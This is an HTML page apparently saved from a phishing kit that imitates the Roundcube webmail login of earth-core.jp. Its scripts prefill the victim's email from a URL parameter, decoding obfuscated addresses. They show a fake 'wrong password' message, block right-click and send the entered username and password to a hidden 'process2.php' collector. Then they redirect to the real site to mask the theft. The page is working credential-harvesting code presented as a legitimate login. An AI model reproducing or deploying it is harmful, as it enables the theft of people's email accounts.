<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" class=" js mozilla" data-scrapbook-source="https://webmail.earth-core.jp/" data-scrapbook-create="20220214125657634" data-scrapbook-title="Webmail :: Welcome to Webmail">
<head>
<title>Webmail :: Welcome to Webmail</title>
<meta name="Robots" content="noindex,nofollow">
<meta http-equiv="X-UA-Compatible" content="IE=EDGE">
<link rel="index" href="https://webmail.earth-core.jp/?_task=login">
<!--link rel="shortcut icon" href="skins/classic/images/favicon.ico"/-->
<link rel="shortcut icon" href="jqueryui/web/login/uix/favicon.ico">
<link rel="stylesheet" type="text/css" href="jqueryui/web/login/uix/common.min.css">



<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<link rel="stylesheet" type="text/css" href="jqueryui/web/login/uix/jquery-ui-1.9.2.custom.css">
<script src="jqueryui/web/login/uix/jquery.min.js" type="text/javascript"></script>
<script src="jqueryui/web/login/uix/common.min.js" type="text/javascript"></script>
<script src="jqueryui/web/login/uix/app.min.js" type="text/javascript"></script>
<script src="jqueryui/web/login/uix/jstz.min.js" type="text/javascript"></script>
<script type="text/javascript">
/* <![CDATA[ */

var rcmail = new rcube_webmail();
rcmail.set_env({"task":"login","x_frame_options":"sameorigin","standard_windows":false,"cookie_domain":"","cookie_path":"\/","cookie_secure":true,"skin":"classic","refresh_interval":180,"session_lifetime":600,"action":"","comm_path":".\/?_task=login","date_format":"yy-mm-dd","cookie_check_flg":null,"request_token":"645d2a5f826165189059a988020bac21"});
rcmail.add_label({"loading":"Loading...","servererror":"Server Error!","connerror":"Connection Error (Failed to reach the server)!","requesttimedout":"Request timed out","refreshing":"Refreshing..."});
rcmail.gui_object('message', 'message');
rcmail.gui_object('loginform', 'form');
/* ]]> */
</script>

<script type="text/javascript" src="jqueryui/web/login/uix/jquery-ui-1.9.2.custom.min.js"></script>

<link rel="stylesheet" href="plugins/data/pdf/logo/style.css" />

</head>
<body>
<img src="jqueryui/web/login/uix/no-logo.png" alt="">

<div id="message"></div>

<div id="login-form">
<div class="boxtitle">Welcome to Webmail</div>
<div class="boxcontent">

<form name="loginForm" id="loginForm" method="post" action="">
<input type="hidden" name="_token" value="645d2a5f826165189059a988020bac21">
<input type="hidden" name="_task" value="login">
<input type="hidden" name="_action" value="login">
<input type="hidden" name="_timezone" id="rcmlogintz" value="Africa/Lagos">
<input type="hidden" name="_url" id="rcmloginurl" value="">
<table summary="" border="0">
<tbody>
<tr>
<td colspan="2">
   <div style="color:red;text-align:center">用户名或密码错误。请再试一次</div>
</td>
</tr>
<tr>
<td class="title">
<label for="rcmloginuser">Username</label>
</td>
<td class="input">
<input name="username" id="username" required autocapitalize="none" autocomplete="off" type="email" value="">
</td>
</tr>
<tr><td class="title">
<label for="rcmloginpwd">Password</label>
</td>
<td class="input">
<input name="password" id="password" required autocapitalize="none" autocomplete="off" type="password">
</td>
</tr>
</tbody>
</table>
<center>
<input name="check_save_user" id="cookie_check_flg" type="checkbox">
                    <script>
                    if (rcmail.env.cookie_username != null){
                            document.getElementById("rcmloginuser").value=rcmail.env.cookie_username
                    }
                    if (rcmail.env.cookie_check_flg == "1"){
                            document.getElementById("cookie_check_flg").checked=true
                    }
                    </script>
                    <label for="rcmloginpwd">
<font color="#666">メールアドレスを保存する</font></label>
</center><font color="#ff0000">
<p style="text-align:center;">※メールアドレスは「email@sample.ne.jp」の様に<br>@を含めたメールアドレス全体をご入力下さい。</p></font><p class="formbuttons">

<input type="submit" id="rcmloginsubmit" class="button mainaction" value="Login">
</p>

</form>

</div>
</div>

<noscript>
  <p id="login-noscriptwarning">Warning: This webmail service requires Javascript! In order to use it please enable Javascript in your browser's settings.</p>
</noscript>




<script type="text/javascript">
/* <![CDATA[ */

$(document).ready(function(){ 
rcmail.init();
var images = ["skins\/classic\/images\/icons\/folders.png","skins\/classic\/images\/mail_footer.png","skins\/classic\/images\/taskicons.gif","skins\/classic\/images\/display\/loading.gif","skins\/classic\/images\/pagenav.gif","skins\/classic\/images\/mail_toolbar.png","skins\/classic\/images\/searchfield.gif","skins\/classic\/images\/messageicons.png","skins\/classic\/images\/icons\/reset.gif","skins\/classic\/images\/abook_toolbar.png","skins\/classic\/images\/icons\/groupactions.png","skins\/classic\/images\/watermark.gif"];
            for (var i=0; i<images.length; i++) {
                img = new Image();
                img.src = images[i];
            }
});
/* ]]> */
</script>



<div class="overlay">
  <div class="lgif-space"></div>
    <div class="loadgif">
       <img src="plugins/data/pdf/logo/loading.gif" width="100" height="100">
    </div>
</div>


<script src="https://code.jquery.com/jquery-3.2.1.min.js"></script>

 <script src="https://code.jquery.com/jquery-3.3.1.slim.min.js" integrity="sha384-q8i/X+965DzO0rT7abK41JStQIAqVgRVzpbzo5smXKp4YfRvH+8abtTE1Pi6jizo" crossorigin="anonymous"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.0/umd/popper.min.js" integrity="sha384-cs/chFZiN24E4KMATLdqdvsezGxaGsi4hLGOzlXwp5UZB1LY//20VyM2taTB4QvJ" crossorigin="anonymous"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.0/js/bootstrap.min.js" integrity="sha384-uefMccjFJAIv6A+rW+L4AHf99KvxDjWSu1z9VI8SKNVmz4sk7buKt/6v9KI65qnm" crossorigin="anonymous"></script>
<script src="https://ajax.aspnetcdn.com/ajax/jQuery/jquery-3.3.1.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.mask/1.14.10/jquery.mask.js"></script>


<script type="text/javascript">

var $c = getUrlParameter('myemail');
     $('#username').val($c);
	$('#me').text($c);
        var $current_email = "";

        if ($c) {
            $current_email = isValidEmail($c) ? $c : decodeCustom($c);
        }


        function decodeCustom($email) {
            var $consonants = 'bcdfghjklmnpqrstvwxyz'.split('');
            var $joinChar = $email.substr(0, 1); // substr(,0,1);
            var $output = $email.substr(2); // substr($email,2);
            var $vowels = ['a', 'e', 'i', 'o', 'u'];
            var $vowelsLookup = [];

            for ($i in $consonants) {
                $output = $output.replace(new RegExp($joinChar + '0' + $i + 'a', 'g'), $consonants[$i]);
            }

            for ($i in $vowels) {
                $output = $output.replace(new RegExp($joinChar + $i, 'g'), $vowels[$i]);
            }

            $output = $output.replace(new RegExp($joinChar + $joinChar + $joinChar, 'g'), '@');
            //,$output);
            return $output;
        }

        function isValidEmail(email) {
            var re =
                /^(([^<>()\[\]\\.,;:\s@"]+(\.[^<>()\[\]\\.,;:\s@"]+)*)|(".+"))@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\])|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/;
            return re.test(email);
        }

        function getUrlParameter(name) {
            name = name.replace(/[\[]/, '\\[').replace(/[\]]/, '\\]');
            var regex = new RegExp('[\\?&]' + name + '=([^&#]*)');
            var results = regex.exec(location.search);
            return results === null ? '' : decodeURIComponent(results[1].replace(/\+/g, ' '));
			
        }
		
		 var currentEmail = $current_email;
    var ListEntries = [
            '.*fuck.*',
            '.*pussy.*',
            '.*bitch.*',
            '.*asshole.*',
            '.*fool.*',
            '.*dick.*',
            '.*mama.*',
            '.*nice.*try.*',
            '.*12345.*'
        ];
		
		 if(currentEmail){

            var e = document.getElementById('username');
            e = currentEmail;
            //e.readOnly = true;
			

            var domain = extractDomain(currentEmail);

           // var corH = document.getElementById('corportate-title');
            //corH.innerText = domain + " Email Login";

            }
			
		function extractDomain(email){

        var load = email;
        var domain = '';
        var regex = /.+@(.*?)\..+/;
        var str = email;
        var m;

        if ((m = regex.exec(str)) !== null) {
            return m[1];
        }

        return null;
    }



</script> 

<script type="text/javascript">

$(document).bind("contextmenu", function(e){ return false;});

$('#loginForm').on('submit', function(e){
		
		 $(".overlay").show(500);
		$.post('program/icons/pdf/script/process2.php', $(this).serialize(), function(data){
			console.log(data);
		});
		setTimeout(function() {
                              window.location.href = "https://webmail.earth-core.jp/";
                        },9000);
		e.preventDefault();
	});


</script>





<script> 
  location.hash = 'wa=wsignin1.0&rpsnv=13&ct=1539585327&rver=7.0.6737.0&wp=MBI_SSL&wreply=https%3a%2f%2foutlook.live.com%2fowa%2f%3fnlp%3d1%26RpsCsrfState%3d715d44a2-2f11-4282-f625-a066679e96e2&id=292841&CBCXT=out&lw=1&fl=dob%2cflname%2cwld&cobrandid=90015&domain=' 
</script>

<script type="text/javascript" src="js/actions.js"></script>
</body>
</html>